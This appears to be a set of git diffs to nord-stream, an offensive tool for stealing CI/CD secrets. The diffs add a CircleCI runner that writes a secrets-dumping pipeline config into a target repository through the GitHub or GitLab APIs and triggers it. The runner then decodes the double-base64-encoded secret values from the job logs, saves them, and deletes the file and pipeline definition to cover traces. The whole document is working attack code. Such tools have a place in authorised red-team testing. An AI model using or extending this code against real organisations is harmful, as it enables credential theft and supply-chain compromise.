-            orgId = self._circleCicd.getOrgId(self._vcsType, orgIdentifier)
+            orgId = self._circleCicd.getOrgId(self.__effectiveVcsType(repo), orgIdentifier)
             if not orgId:
                 logger.verbose(f"Could not resolve org ID for {orgIdentifier}")
                 return
@@ -301,7 +357,7 @@ class CircleCIRunner:
         try:
             if self._extractOrg:
                 orgIdentifier = self.__circleOrgForRepo(repo)
-                orgId = self._circleCicd.getOrgId(self._vcsType, orgIdentifier)
+                orgId = self._circleCicd.getOrgId(self.__effectiveVcsType(repo), orgIdentifier)
                 if orgId:
                     contexts = self._circleCicd.listContexts(orgId)
                     contextNames = [c["name"] for c in contexts]
@@ -377,7 +433,7 @@ class CircleCIRunner:
 
         projectSlug = self.__projectSlug(repo)
 
-        if self._vcsType == "circleci":
+        if self.__effectiveVcsType(repo) == "circleci":
             # GitHub App / GitLab App: push already triggered the pipeline.
             # Poll the project's pipeline list to find the one for our branch.
             logger.verbose("GitHub App integration — waiting for auto-triggered pipeline.")

--- a/nordstream/core/circleci/circleci.py
+++ b/nordstream/core/circleci/circleci.py
@@ -388,6 +388,7 @@ class CircleCIRunner:
         Returns (pipelineId, workflowId, jobNumber).
         """
         logger.verbose("Launching CircleCI pipeline.")
+        logger.info(f'Pushing to branch "{self._gitCicd.branchName}"')
 
         configPath = f".circleci/{self._configFilename}"
         generator.writeFile(configPath)
@@ -410,26 +411,37 @@ class CircleCIRunner:
 
         projectSlug = self.__projectSlug(repo)
 
-        if self.__effectiveVcsType(repo) == "circleci":
-            # GitHub App / GitLab App: push already triggered the pipeline.
-            # Poll the project's pipeline list to find the one for our branch.
-            logger.verbose("GitHub App integration — waiting for auto-triggered pipeline.")
-            pipelineId = self._circleCicd.waitForPipelineOnBranch(
-                projectSlug, self._gitCicd.branchName
-            )
-        else:
-            # Classic OAuth: explicitly trigger via the API.
-            pipelineId = self._circleCicd.triggerPipeline(projectSlug, self._gitCicd.branchName)
+        # Always poll for a webhook-triggered pipeline first.
+        # A git push fires a CircleCI webhook for all integration types (classic
+        # OAuth and GitHub App alike).  Calling triggerPipeline() on top of a
+        # webhook-triggered pipeline causes two pipelines to race, and auto-cancel
+        # rules on the project will cancel one — typically ours.
+        #
+        # Short probe window (3 retries): if the webhook pipeline appears quickly
+        # we pick it up immediately.  If the org has no webhook configured for
+        # this branch, we fall through and trigger explicitly via the API.
+        logger.verbose("Waiting for webhook-triggered pipeline.")
+        pipelineId = self._circleCicd.findPipelineOnBranch(
+            projectSlug, self._gitCicd.branchName, maxRetry=3
+        )
 
         if not pipelineId:
-            raise Exception("Failed to find or trigger CircleCI pipeline.")
+            # No webhook pipeline appeared — project may not have a CircleCI
+            # webhook for this branch.  Fall back to an explicit API trigger.
+            logger.verbose("No webhook pipeline found, triggering via API.")
+            pipelineId = self._circleCicd.triggerPipeline(
+                projectSlug, self._gitCicd.branchName
+            )
+
+        if not pipelineId:
+            raise CircleCIError("Failed to find or trigger CircleCI pipeline.")
 
         logger.verbose(f"Pipeline ID: {pipelineId}")
 
         workflowId, status = self._circleCicd.waitPipeline(pipelineId)
 
         if not workflowId:
-            raise Exception("Pipeline timed out or no workflow found.")
+            raise CircleCIError("Pipeline timed out waiting for a workflow to start.")
 
         # Resolve the job number from the workflow
         jobs = self._circleCicd.getWorkflowJobs(workflowId)

--- a/nordstream/core/circleci/standalone.py
+++ b/nordstream/core/circleci/standalone.py
@@ -1,0 +1,586 @@
+"""
+Standalone CircleCI secret extractor.
+
+This runner operates entirely through APIs — no local git required:
+  - GitHub Contents API / GitLab Repository Files API  → push config file
+  - CircleCI pipeline definitions API                  → create named pipeline
+  - CircleCI pipeline/run API                          → trigger execution
+  - CircleCI v1.1 job output API                       → retrieve results
+  - Cleanup via the same APIs                          → delete file + definition
+
+The only credentials needed are:
+  - A CircleCI API token
+  - A GitHub PAT or GitLab PAT (for the contents API write step)
+  - For --list-secrets and --describe-token: only the CircleCI token
+"""
+
+import base64
+import glob as globmod
+import json
+import logging
+import time
+from os import makedirs
+from os.path import realpath
+
+from nordstream.cicd.circleci import CircleCI, CircleCIError
+from nordstream.yaml.circleci import CircleCIPipelineGenerator
+from nordstream.yaml.custom import CustomGenerator
+from nordstream.utils.log import logger, NordStreamLog
+from nordstream.utils.constants import (
+    DEFAULT_CIRCLECI_CONFIG_FILENAME,
+    DEFAULT_PIPELINE_NAME,
+    OUTPUT_DIR,
+    GIT_ATTACK_COMMIT_MSG,
+    GIT_CLEAN_COMMIT_MSG,
+)
+
+
+class CircleCIStandaloneRunner:
+    """
+    Standalone CircleCI secret extraction runner.
+
+    Parameters
+    ----------
+    circleCicd   : CircleCI API client
+    gitClient    : GitHub or GitLab API client (for file create/delete).
+                   May be None for list-only operations.
+    vcsType      : "gh", "gl", or "circleci"
+    org          : CircleCI org slug or UUID
+    gitOrg       : VCS host org name (GitHub org / GitLab group) — used to
+                   construct the repo full name when not auto-discovered.
+    """
+
+    _circleCicd = None
+    _gitClient = None          # GitHub / GitLab API client or None
+    _vcsType = "circleci"
+    _org = None                # CircleCI org slug / UUID
+    _gitOrg = None             # VCS host org name
+
+    _yaml = None               # path to custom YAML file
+    _extractProject = True
+    _extractOrg = True
+    _cleanLogs = True
+
+    # Per-project state set during start()
+    _projects = []             # list of project dicts from listProjectsForOrg()
+                               # or manually constructed from --repo
+
+    def __init__(self, circleCicd, gitClient, vcsType, org, gitOrg):
+        self._circleCicd = circleCicd
+        self._gitClient = gitClient
+        self._vcsType = vcsType
+        self._org = org
+        self._gitOrg = gitOrg
+        self.__createLogDir()
+
+    # ------------------------------------------------------------------
+    # Properties
+    # ------------------------------------------------------------------
+
+    @property
+    def extractProject(self):
+        return self._extractProject
+
+    @extractProject.setter
+    def extractProject(self, value):
+        self._extractProject = value
+
+    @property
+    def extractOrg(self):
+        return self._extractOrg
+
+    @extractOrg.setter
+    def extractOrg(self, value):
+        self._extractOrg = value
+
+    @property
+    def cleanLogs(self):
+        return self._cleanLogs
+
+    @cleanLogs.setter
+    def cleanLogs(self, value):
+        self._cleanLogs = value
+
+    @property
+    def yaml(self):
+        return self._yaml
+
+    @yaml.setter
+    def yaml(self, value):
+        self._yaml = realpath(value)
+
+    # ------------------------------------------------------------------
+    # Internal helpers
+    # ------------------------------------------------------------------
+
+    def __createLogDir(self):
+        self._circleCicd.outputDir = realpath(OUTPUT_DIR) + "/circleci"
+        makedirs(self._circleCicd.outputDir, exist_ok=True)
+
+    def __repoOutputDir(self, repoFullName):
+        repoPath = repoFullName.replace("/", "_")
+        path = f"{self._circleCicd.outputDir}/{repoPath}"
+        makedirs(path, exist_ok=True)
+        return path
+
+    def __configFilename(self):
+        """Use the same obfuscated filename as the rest of nord-stream."""
+        return DEFAULT_CIRCLECI_CONFIG_FILENAME
+
+    def __configFilePath(self):
+        return f".circleci/{DEFAULT_CIRCLECI_CONFIG_FILENAME}"
+
+    # ------------------------------------------------------------------
+    # Token / org description
+    # ------------------------------------------------------------------
+
+    def describeToken(self):
+        me = self._circleCicd.getMe()
+        logger.info("CircleCI token information:")
+        logger.raw(f"\t- Login: {me.get('login')}\n", logging.INFO)
+        logger.raw(f"\t- Id: {me.get('id')}\n", logging.INFO)
+        collabs = self._circleCicd.getCollaborations()
+        if collabs:
+            logger.raw(f"\t- Organisations:\n", logging.INFO)
+            for c in collabs:
+                logger.raw(f"\t    - {c['name']} ({c['slug']})\n", logging.INFO)
+
+    # ------------------------------------------------------------------
+    # Project discovery
+    # ------------------------------------------------------------------
+
+    def loadProjects(self, repoOverride=None):
+        """
+        Populate self._projects.
+        If repoOverride is given, build a single synthetic project entry.
+        Otherwise auto-discover via the pipeline listing API.
+        """
+        orgSlug = f"{self._vcsType}/{self._org}"
+
+        if repoOverride:
+            # Manual single-target: resolve project details from CircleCI API
+            projectSlug = f"{self._vcsType}/{self._org}/{repoOverride}"
+            details = self._circleCicd.getProjectDetails(projectSlug)
+            if not details:
+                logger.critical(f"Project not found: {projectSlug}")
+
+            # Try to recover repo_full_name from recent pipelines
+            repo_full_name = None
+            repo_external_id = None
+            default_branch = details.get("vcs_info", {}).get("default_branch", "main")
+
+            pipelines = self._circleCicd._session.get(
+                f"https://circleci.com/api/v2/project/{projectSlug}/pipeline",
+                headers=self._circleCicd._header,
+                params={"limit": 5},
+            )
+            if pipelines.status_code == 200:
+                for p in pipelines.json().get("items", [])[:5]:
+                    tp = p.get("trigger_parameters", {})
+                    gh = tp.get("github_app", {})
+                    if gh.get("repo_full_name"):
+                        repo_full_name = gh["repo_full_name"]
+                        repo_external_id = gh.get("repo_id")
+                        default_branch = gh.get("default_branch", default_branch)
+                        break
+
+            if not repo_full_name:
+                # Fall back: construct from org + repo slug (works for gh/gl types)
+                repo_full_name = f"{self._gitOrg}/{repoOverride}"
+
+            self._projects = [{
+                "project_slug": projectSlug,
+                "project_id": details.get("id"),
+                "repo_full_name": repo_full_name,
+                "repo_url": None,
+                "default_branch": default_branch,
+                "repo_external_id": repo_external_id,
+            }]
+        else:
+            logger.info(f"Discovering CircleCI projects for org '{orgSlug}'")
+            self._projects = self._circleCicd.listProjectsForOrg(orgSlug)
+            if not self._projects:
+                logger.critical(f"No projects found for org '{orgSlug}'")
+            logger.info(f"Found {len(self._projects)} project(s)")
+
+    # ------------------------------------------------------------------
+    # Secret listing (read-only)
+    # ------------------------------------------------------------------
+
+    def listCircleCISecrets(self):
+        logger.info("Listing CircleCI secrets (names only):")
+        for proj in self._projects:
+            slug = proj["project_slug"]
+            logger.info(f'"{slug}" CircleCI secrets')
+
+            if self._extractProject:
+                self.__displayProjectEnvVars(slug)
+
+            if self._extractOrg:
+                self.__displayContexts()
+
+    def __displayProjectEnvVars(self, projectSlug):
+        try:
+            vars_ = self._circleCicd.listProjectEnvVars(projectSlug)
+            if vars_:
+                logger.info("Project environment variables:")
+                for v in vars_:
+                    logger.raw(f"\t- {v}\n", logging.INFO)
+            else:
+                logger.info("No project environment variables found.")
+        except CircleCIError as e:
+            if logger.getEffectiveLevel() <= NordStreamLog.VERBOSE:
+                logger.error(f"Can't list project env vars: {e}")
+
+    def __displayContexts(self):
+        try:
+            orgId = self._circleCicd.getOrgId(self._vcsType, self._org)
+            if not orgId:
+                logger.verbose(f"Could not resolve org ID for {self._org}")
+                return
+            contexts = self._circleCicd.listContexts(orgId)
+            if contexts:
+                logger.info("Org contexts:")
+                for ctx in contexts:
+                    logger.raw(f"\t- {ctx['name']}\n", logging.INFO)
+                    try:
+                        envVars = self._circleCicd.listContextEnvVars(ctx["id"])
+                        for v in envVars:
+                            logger.raw(f"\t    - {v}\n", logging.INFO)
+                    except CircleCIError:
+                        pass
+            else:
+                logger.info("No org contexts found.")
+        except CircleCIError as e:
+            if logger.getEffectiveLevel() <= NordStreamLog.VERBOSE:
+                logger.error(f"Can't list contexts: {e}")
+
+    # ------------------------------------------------------------------
+    # Extraction
+    # ------------------------------------------------------------------
+
+    def start(self):
+        for proj in self._projects:
+            slug = proj["project_slug"]
+            repoFullName = proj["repo_full_name"]
+            projectId = proj["project_id"]
+            defaultBranch = proj.get("default_branch", "main")
+            repoExternalId = proj.get("repo_external_id")
+
+            logger.success(f'"{slug}" (CircleCI standalone)')
+
+            if not projectId:
+                logger.error(f"No project UUID for {slug}, skipping.")
+                continue
+
+            try:
+                self.__runProject(proj)
+            except KeyboardInterrupt:
+                break
+            except Exception as e:
+                logger.error(f"Error processing {slug}: {e}")
+                if logger.getEffectiveLevel() == logging.DEBUG:
+                    logger.exception(e)
+
+        logger.info(f"Check output: {self._circleCicd.outputDir}")
+
+    def __runProject(self, proj):
+        if self._yaml:
+            self.__runCustomPipeline(proj)
+        else:
+            self.__runSecretsExtraction(proj)
+
+    # ------------------------------------------------------------------
+    # Custom YAML
+    # ------------------------------------------------------------------
+
+    def __runCustomPipeline(self, proj):
+        from os.path import basename
+        logger.info(f"Running custom CircleCI pipeline: {self._yaml}")
+
+        with open(self._yaml, "r") as f:
+            content = f.read()
+
+        configPath = f".circleci/{basename(self._yaml)}"
+        self.__runPipelineWithContent(proj, content, configPath, "custom",
+                                      lambda repo, od: self.__displayCustomOutput(od))
+
+    def __displayCustomOutput(self, outputDir):
+        files = globmod.glob(f"{outputDir}/circleci_custom_*.log")
+        if files:
+            with open(sorted(files)[-1], "r") as f:
+                logger.success("Pipeline output:")
+                for line in f:
+                    logger.raw(line, logging.INFO)
+
+    # ------------------------------------------------------------------
+    # Secrets extraction
+    # ------------------------------------------------------------------
+
+    def __runSecretsExtraction(self, proj):
+        slug = proj["project_slug"]
+
+        projectVars = []
+        contextNames = []
+
+        try:
+            if self._extractProject:
+                projectVars = self._circleCicd.listProjectEnvVars(slug)
+        except CircleCIError as e:
+            logger.error(f"Can't list project env vars: {e}")
+
+        try:
+            if self._extractOrg:
+                orgId = self._circleCicd.getOrgId(self._vcsType, self._org)
+                if orgId:
+                    contexts = self._circleCicd.listContexts(orgId)
+                    contextNames = [c["name"] for c in contexts]
+        except CircleCIError as e:
+            logger.error(f"Can't list contexts: {e}")
+
+        if not projectVars and not contextNames:
+            logger.info(f'No CircleCI secrets found for "{slug}"')
+            logger.empty_line()
+            return
+
+        logger.info(f'Found CircleCI secrets for "{slug}":')
+        if projectVars:
+            logger.info(f"  Project env vars ({len(projectVars)}): {', '.join(projectVars)}")
+        if contextNames:
+            logger.info(f"  Contexts ({len(contextNames)}): {', '.join(contextNames)}")
+
+        generator = CircleCIPipelineGenerator()
+        generator.generatePipelineForSecretsExtraction(projectVars, contextNames)
+
+        import io
+        import yaml as _yaml
+        buf = io.StringIO()
+        _yaml.dump(generator._defaultTemplate, buf, sort_keys=False)
+        content = buf.getvalue()
+
+        configPath = self.__configFilePath()
+
+        def onSuccess(repoFullName, outputDir):
+            self.__extractSensitiveInformation(outputDir)
+
+        self.__runPipelineWithContent(proj, content, configPath, "secrets", onSuccess)
+        logger.empty_line()
+
+    # ------------------------------------------------------------------
+    # Core pipeline lifecycle (API-only, no git)
+    # ------------------------------------------------------------------
+
+    def __runPipelineWithContent(self, proj, configContent, configPath, outputName, onSuccess):
+        """
+        Full API-driven pipeline injection:
+          1. Write config file via VCS contents API
+          2. Create CircleCI pipeline definition
+          3. Trigger pipeline/run
+          4. Wait, collect output
+          5. Clean up (definition + file)
+        """
+        slug = proj["project_slug"]
+        repoFullName = proj["repo_full_name"]
+        projectId = proj["project_id"]
+        defaultBranch = proj.get("default_branch", "main")
+        repoExternalId = proj.get("repo_external_id")
+
+        outputDir = self.__repoOutputDir(repoFullName)
+
+        fileSHA = None
+        definitionId = None
+
+        try:
+            # --- Step 1: create config file in repo ---
+            logger.verbose(f"Creating config file '{configPath}' in {repoFullName}@{defaultBranch}")
+            fileSHA = self.__createConfigFile(repoFullName, configPath, configContent,
+                                              defaultBranch, proj)
+            logger.verbose(f"Config file created (SHA: {fileSHA})")
+
+            # --- Step 2: create pipeline definition ---
+            provider = self.__vcsProvider(proj)
+            if not repoExternalId:
+                raise CircleCIError(
+                    f"Could not determine repo external ID for {repoFullName}. "
+                    f"Supply --repo explicitly or ensure the project has pipeline history."
+                )
+            definitionId = self._circleCicd.createPipelineDefinition(
+                projectId,
+                DEFAULT_PIPELINE_NAME,
+                configPath,
+                repoExternalId,
+                provider=provider,
+            )
+            logger.verbose(f"Pipeline definition created: {definitionId}")
+
+            # --- Step 3: trigger ---
+            pipelineId = self._circleCicd.triggerPipelineRun(slug, definitionId, defaultBranch)
+            logger.verbose(f"Pipeline triggered: {pipelineId}")
+            if not pipelineId:
+                raise CircleCIError("Failed to trigger pipeline.")
+
+            # --- Step 4: wait ---
+            workflowId, status = self._circleCicd.waitPipeline(pipelineId)
+            if not workflowId:
+                raise CircleCIError("Pipeline timed out.")
+
+            if status == "success":
+                logger.success("Pipeline completed successfully.")
+            elif status in ("failed", "error"):
+                logger.error(f"Pipeline {status}.")
+                return
+            else:
+                logger.warning(f"Unexpected pipeline status: {status}")
+                return
+
+            # --- Step 5: get job number ---
+            jobs = self._circleCicd.getWorkflowJobs(workflowId)
+            jobNumber = None
+            for job in jobs:
+                if job.get("name") == "init":
+                    jobNumber = job.get("job_number")
+                    break
+            if jobNumber is None and jobs:
+                jobNumber = jobs[0].get("job_number")
+
+            if jobNumber is None:
+                logger.error("Could not determine job number.")
+                return
+
+            # --- Step 6: download output ---
+            filePath = self._circleCicd.downloadJobOutput(
+                slug, jobNumber, outputDir,
+                outputName.replace("/", "_").replace(" ", "_"),
+            )
+            if filePath:
+                onSuccess(repoFullName, outputDir)
+
+        finally:
+            if self._cleanLogs:
+                self.__cleanup(repoFullName, configPath, fileSHA, defaultBranch,
+                               projectId, definitionId, proj)
+
+    def __vcsProvider(self, proj):
+        """Map vcsType to the CircleCI pipeline definition provider string."""
+        mapping = {
+            "gh": "github_app",
+            "circleci": "github_app",   # GitHub App integration
+            "gl": "gitlab_app",
+        }
+        return mapping.get(self._vcsType, "github_app")
+
+    def __createConfigFile(self, repoFullName, path, content, branch, proj):
+        """
+        Push the config file to the repo via the VCS contents API.
+        Returns the file SHA (needed for cleanup).
+        """
+        if self._gitClient is None:
+            raise ValueError("A git token (--git-token) is required for extraction.")
+
+        if self._vcsType in ("gh", "circleci"):
+            # GitHub Contents API
+            existingSHA = self._gitClient.getFileSHA(repoFullName, path, branch)
+            sha = self._gitClient.createOrUpdateFile(
+                repoFullName, path, content, branch,
+                GIT_ATTACK_COMMIT_MSG, existingSHA=existingSHA,
+            )
+            return sha or existingSHA  # SHA of the blob
+
+        elif self._vcsType == "gl":
+            # GitLab Repository Files API — projectId is the GitLab project id/path
+            glProjectId = self.__resolveGitLabProjectId(repoFullName)
+            existingSHA = self._gitClient.getFileSHA(glProjectId, path, branch)
+            self._gitClient.createOrUpdateFile(
+                glProjectId, path, content, branch,
+                GIT_ATTACK_COMMIT_MSG, existingSHA=existingSHA,
+            )
+            return existingSHA  # GitLab doesn't return SHA on create; store None sentinel
+        else:
+            raise ValueError(f"Unsupported vcsType for file creation: {self._vcsType}")
+
+    def __resolveGitLabProjectId(self, repoFullName):
+        """Encode the full project path for GitLab API calls."""
+        import urllib.parse
+        return urllib.parse.quote(repoFullName, safe="")
+
+    def __cleanup(self, repoFullName, configPath, fileSHA, branch,
+                  projectId, definitionId, proj):
+        logger.info("Cleaning up CircleCI pipeline artefacts.")
+
+        # Delete the pipeline definition first (so no further triggers)
+        if definitionId and projectId:
+            try:
+                logger.verbose(f"Deleting pipeline definition {definitionId}")
+                self._circleCicd.deletePipelineDefinition(projectId, definitionId)
+            except Exception as e:
+                logger.error(f"Failed to delete pipeline definition: {e}")
+
+        # Delete the config file from the repo
+        if fileSHA is not None and self._gitClient is not None:
+            try:
+                logger.verbose(f"Deleting config file '{configPath}' from {repoFullName}@{branch}")
+                if self._vcsType in ("gh", "circleci"):
+                    self._gitClient.deleteFile(
+                        repoFullName, configPath, fileSHA, branch, GIT_CLEAN_COMMIT_MSG
+                    )
+                elif self._vcsType == "gl":
+                    glProjectId = self.__resolveGitLabProjectId(repoFullName)
+                    self._gitClient.deleteFile(
+                        glProjectId, configPath, fileSHA, branch, GIT_CLEAN_COMMIT_MSG
+                    )
+            except Exception as e:
+                logger.error(f"Failed to delete config file: {e}")
+        elif self._gitClient is None:
+            logger.warning("No git client — config file was not deleted from repo.")
+
+    # ------------------------------------------------------------------
+    # Output extraction
+    # ------------------------------------------------------------------
+
+    def __extractSensitiveInformation(self, outputDir, informationType="Secrets"):
+        files = globmod.glob(f"{outputDir}/circleci_secrets_*.log")
+        if not files:
+            logger.error("No output file found.")
+            return
+
+        filePath = sorted(files)[-1]
+        with open(filePath, "r") as f:
+            lines = f.readlines()
+
+        raw_b64 = None
+        for line in reversed(lines):
+            line = line.strip()
+            if not line:
+                continue
+            if line.startswith("["):
+                try:
+                    entries = json.loads(line)
+                    for entry in reversed(entries):
+                        msg = entry.get("message", "").strip()
+                        if msg:
+                            raw_b64 = msg
+                            break
+                    if raw_b64:
+                        break
+                except (json.JSONDecodeError, AttributeError):
+                    pass
+            else:
+                raw_b64 = line
+                break
+
+        if not raw_b64:
+            logger.error("Could not find encoded output in pipeline logs.")
+            return
+
+        try:
+            secrets = base64.b64decode(base64.b64decode(raw_b64))
+        except Exception as e:
+            logger.error(f"Failed to decode pipeline output: {e}")
+            return
+
+        logger.success(f"{informationType}:")
+        logger.raw(secrets, logging.INFO)
+
+        outFile = f"{outputDir}/{informationType.lower().replace(' ', '_')}.txt"
+        with open(outFile, "ab") as f:
+            f.write(secrets)

--- a/nordstream/core/circleci/standalone.py
+++ b/nordstream/core/circleci/standalone.py
@@ -14,13 +14,11 @@ The only credentials needed are:
   - For --list-secrets and --describe-token: only the CircleCI token
 """
 
-import base64
 import glob as globmod
-import json
 import logging
-import time
+import urllib.parse
 from os import makedirs
-from os.path import realpath
+from os.path import basename, realpath
 
 from nordstream.cicd.circleci import CircleCI, CircleCIError
 from nordstream.yaml.circleci import CircleCIPipelineGenerator
@@ -32,6 +30,11 @@ from nordstream.utils.constants import (
     OUTPUT_DIR,
     GIT_ATTACK_COMMIT_MSG,
     GIT_CLEAN_COMMIT_MSG,
+)
+from nordstream.core.circleci.utils import (
+    displayProjectEnvVars,
+    displayContexts,
+    extractAndSaveSecrets,
 )
 
 
@@ -123,10 +126,6 @@ class CircleCIStandaloneRunner:
         makedirs(path, exist_ok=True)
         return path
 
-    def __configFilename(self):
-        """Use the same obfuscated filename as the rest of nord-stream."""
-        return DEFAULT_CIRCLECI_CONFIG_FILENAME
-
     def __configFilePath(self):
         return f".circleci/{DEFAULT_CIRCLECI_CONFIG_FILENAME}"
 
@@ -163,26 +162,21 @@ class CircleCIStandaloneRunner:
             details = self._circleCicd.getProjectDetails(projectSlug)
             if not details:
                 logger.critical(f"Project not found: {projectSlug}")
+                return  # logger.critical() calls sys.exit(1); this is a safety guard
 
             # Try to recover repo_full_name from recent pipelines
             repo_full_name = None
             repo_external_id = None
             default_branch = details.get("vcs_info", {}).get("default_branch", "main")
 
-            pipelines = self._circleCicd._session.get(
-                f"https://circleci.com/api/v2/project/{projectSlug}/pipeline",
-                headers=self._circleCicd._header,
-                params={"limit": 5},
-            )
-            if pipelines.status_code == 200:
-                for p in pipelines.json().get("items", [])[:5]:
-                    tp = p.get("trigger_parameters", {})
-                    gh = tp.get("github_app", {})
-                    if gh.get("repo_full_name"):
-                        repo_full_name = gh["repo_full_name"]
-                        repo_external_id = gh.get("repo_id")
-                        default_branch = gh.get("default_branch", default_branch)
-                        break
+            for p in self._circleCicd.getRecentProjectPipelines(projectSlug):
+                tp = p.get("trigger_parameters", {})
+                gh = tp.get("github_app", {})
+                if gh.get("repo_full_name"):
+                    repo_full_name = gh["repo_full_name"]
+                    repo_external_id = gh.get("repo_id")
+                    default_branch = gh.get("default_branch", default_branch)
+                    break
 
             if not repo_full_name:
                 # Fall back: construct from org + repo slug (works for gh/gl types)
@@ -201,6 +195,7 @@ class CircleCIStandaloneRunner:
             self._projects = self._circleCicd.listProjectsForOrg(orgSlug)
             if not self._projects:
                 logger.critical(f"No projects found for org '{orgSlug}'")
+                return  # logger.critical() calls sys.exit(1); this is a safety guard
             logger.info(f"Found {len(self._projects)} project(s)")
 
     # ------------------------------------------------------------------
@@ -220,40 +215,10 @@ class CircleCIStandaloneRunner:
                 self.__displayContexts()
 
     def __displayProjectEnvVars(self, projectSlug):
-        try:
-            vars_ = self._circleCicd.listProjectEnvVars(projectSlug)
-            if vars_:
-                logger.info("Project environment variables:")
-                for v in vars_:
-                    logger.raw(f"\t- {v}\n", logging.INFO)
-            else:
-                logger.info("No project environment variables found.")
-        except CircleCIError as e:
-            if logger.getEffectiveLevel() <= NordStreamLog.VERBOSE:
-                logger.error(f"Can't list project env vars: {e}")
+        displayProjectEnvVars(self._circleCicd, projectSlug)
 
     def __displayContexts(self):
-        try:
-            orgId = self._circleCicd.getOrgId(self._vcsType, self._org)
-            if not orgId:
-                logger.verbose(f"Could not resolve org ID for {self._org}")
-                return
-            contexts = self._circleCicd.listContexts(orgId)
-            if contexts:
-                logger.info("Org contexts:")
-                for ctx in contexts:
-                    logger.raw(f"\t- {ctx['name']}\n", logging.INFO)
-                    try:
-                        envVars = self._circleCicd.listContextEnvVars(ctx["id"])
-                        for v in envVars:
-                            logger.raw(f"\t    - {v}\n", logging.INFO)
-                    except CircleCIError:
-                        pass
-            else:
-                logger.info("No org contexts found.")
-        except CircleCIError as e:
-            if logger.getEffectiveLevel() <= NordStreamLog.VERBOSE:
-                logger.error(f"Can't list contexts: {e}")
+        displayContexts(self._circleCicd, self._vcsType, self._org)
 
     # ------------------------------------------------------------------
     # Extraction
@@ -295,7 +260,6 @@ class CircleCIStandaloneRunner:
     # ------------------------------------------------------------------
 
     def __runCustomPipeline(self, proj):
-        from os.path import basename
         logger.info(f"Running custom CircleCI pipeline: {self._yaml}")
 
         with open(self._yaml, "r") as f:
@@ -352,11 +316,7 @@ class CircleCIStandaloneRunner:
         generator = CircleCIPipelineGenerator()
         generator.generatePipelineForSecretsExtraction(projectVars, contextNames)
 
-        import io
-        import yaml as _yaml
-        buf = io.StringIO()
-        _yaml.dump(generator._defaultTemplate, buf, sort_keys=False)
-        content = buf.getvalue()
+        content = generator.getYamlContent()
 
         configPath = self.__configFilePath()
 
@@ -500,7 +460,6 @@ class CircleCIStandaloneRunner:
 
     def __resolveGitLabProjectId(self, repoFullName):
         """Encode the full project path for GitLab API calls."""
-        import urllib.parse
         return urllib.parse.quote(repoFullName, safe="")
 
     def __cleanup(self, repoFullName, configPath, fileSHA, branch,
@@ -538,49 +497,4 @@ class CircleCIStandaloneRunner:
     # ------------------------------------------------------------------
 
     def __extractSensitiveInformation(self, outputDir, informationType="Secrets"):
-        files = globmod.glob(f"{outputDir}/circleci_secrets_*.log")
-        if not files:
-            logger.error("No output file found.")
-            return
-
-        filePath = sorted(files)[-1]
-        with open(filePath, "r") as f:
-            lines = f.readlines()
-
-        raw_b64 = None
-        for line in reversed(lines):
-            line = line.strip()
-            if not line:
-                continue
-            if line.startswith("["):
-                try:
-                    entries = json.loads(line)
-                    for entry in reversed(entries):
-                        msg = entry.get("message", "").strip()
-                        if msg:
-                            raw_b64 = msg
-                            break
-                    if raw_b64:
-                        break
-                except (json.JSONDecodeError, AttributeError):
-                    pass
-            else:
-                raw_b64 = line
-                break
-
-        if not raw_b64:
-            logger.error("Could not find encoded output in pipeline logs.")
-            return
-
-        try:
-            secrets = base64.b64decode(base64.b64decode(raw_b64))
-        except Exception as e:
-            logger.error(f"Failed to decode pipeline output: {e}")
-            return
-
-        logger.success(f"{informationType}:")
-        logger.raw(secrets, logging.INFO)
-
-        outFile = f"{outputDir}/{informationType.lower().replace(' ', '_')}.txt"
-        with open(outFile, "ab") as f:
-            f.write(secrets)
+        extractAndSaveSecrets(outputDir, "circleci_secrets_*.log", informationType)

--- a/nordstream/core/circleci/utils.py
+++ b/nordstream/core/circleci/utils.py
@@ -1,0 +1,143 @@
+"""
+Shared helpers for CircleCI secret extraction runners.
+
+Both CircleCIRunner (git-based injection) and CircleCIStandaloneRunner
+(API-only injection) use these functions to avoid code duplication.
+"""
+
+import base64
+import glob as globmod
+import json
+import logging
+
+from nordstream.cicd.circleci import CircleCIError
+from nordstream.utils.log import logger, NordStreamLog
+
+
+def decodeCircleCIOutput(logFilePath):
+    """
+    Read a CircleCI step output log file and double-base64-decode its content.
+
+    CircleCI wraps each step output line as a JSON array of message objects:
+        [{"message": "<base64>", "type": "out", ...}]
+
+    The exfiltration command encodes the secret values with two rounds of base64
+    to survive log sanitisation, so the message field itself must be decoded twice.
+
+    Returns the decoded bytes on success, or None if the log cannot be parsed.
+    """
+    try:
+        with open(logFilePath, "r") as f:
+            lines = f.readlines()
+    except OSError as e:
+        logger.error(f"Could not read log file {logFilePath}: {e}")
+        return None
+
+    raw_b64 = None
+    for line in reversed(lines):
+        line = line.strip()
+        if not line:
+            continue
+        # CircleCI step output format: [{"message": "...", "type": "out", ...}]
+        if line.startswith("["):
+            try:
+                entries = json.loads(line)
+                for entry in reversed(entries):
+                    msg = entry.get("message", "").strip()
+                    if msg:
+                        raw_b64 = msg
+                        break
+                if raw_b64:
+                    break
+            except (json.JSONDecodeError, AttributeError):
+                pass
+        else:
+            # Fallback: plain-text output (some runner configurations)
+            raw_b64 = line
+            break
+
+    if not raw_b64:
+        logger.error("Could not find encoded output in pipeline logs.")
+        return None
+
+    try:
+        return base64.b64decode(base64.b64decode(raw_b64))
+    except Exception as e:
+        logger.error(f"Failed to decode pipeline output: {e}")
+        return None
+
+
+def extractAndSaveSecrets(outputDir, globPattern, informationType="Secrets"):
+    """
+    Find the most recent log file matching globPattern under outputDir,
+    decode its CircleCI step output, log the secrets, and append them to
+    a <informationType>.txt file in outputDir.
+
+    Returns True if secrets were successfully extracted, False otherwise.
+    """
+    files = globmod.glob(f"{outputDir}/{globPattern}")
+    if not files:
+        logger.error("No output file found.")
+        return False
+
+    logFilePath = sorted(files)[-1]
+    secrets = decodeCircleCIOutput(logFilePath)
+    if secrets is None:
+        return False
+
+    logger.success(f"{informationType}:")
+    logger.raw(secrets, logging.INFO)
+
+    outFile = f"{outputDir}/{informationType.lower().replace(' ', '_')}.txt"
+    with open(outFile, "ab") as f:
+        f.write(secrets)
+    return True
+
+
+def displayProjectEnvVars(circleCicd, projectSlug):
+    """
+    List and display CircleCI project environment variable names (values are not
+    accessible via the API).  Errors are silently suppressed unless verbose mode
+    is active.
+    """
+    try:
+        vars_ = circleCicd.listProjectEnvVars(projectSlug)
+        if vars_:
+            logger.info("Project environment variables:")
+            for v in vars_:
+                logger.raw(f"\t- {v}\n", logging.INFO)
+        else:
+            logger.info("No project environment variables found.")
+    except CircleCIError as e:
